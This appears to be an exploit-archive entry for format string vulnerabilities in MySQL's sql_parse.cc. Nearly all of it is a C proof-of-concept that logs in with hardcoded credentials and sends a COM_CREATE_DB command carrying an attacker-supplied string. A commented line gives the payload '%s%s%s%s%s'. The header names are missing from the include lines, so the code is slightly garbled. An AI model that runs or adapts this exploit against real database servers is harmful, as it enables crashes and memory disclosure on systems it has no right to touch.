MySQL 'sql_parse.cc' Multiple Format String Vulnerabilities

MySQL 'sql_parse.cc' Multiple Format String Vulnerabilities

#include #include #define USE_OLD_FUNCTIONS #include #define NullS           (char *) 0 int main (int argc, char **argv) {   MYSQL *mysql = NULL;   mysql = mysql_init (mysql);   if (!mysql)     {       puts ("Init faild, out of memory?");       return EXIT_FAILURE;     }   if (!mysql_real_connect (mysql,       /* MYSQL structure to use */                            "localhost", /* server hostname or IP address */                            "monty",      /* mysql user */                            "montypython",  /* password */                            NULL,      /* default database to use, NULL for none */                            0,   /* port number, 0 for default */                            NULL,        /* socket file or named pipe name */                            CLIENT_FOUND_ROWS /* connection flags */ ))     {       puts ("Connect failed/n");     }   else     {       puts ("Connect OK/n"); //      mysql_create_db(mysql, "%s%s%s%s%s");         simple_command(mysql, COM_CREATE_DB, argv[1], strlen(argv[1]), 0);     }   mysql_close (mysql);   return EXIT_SUCCESS; }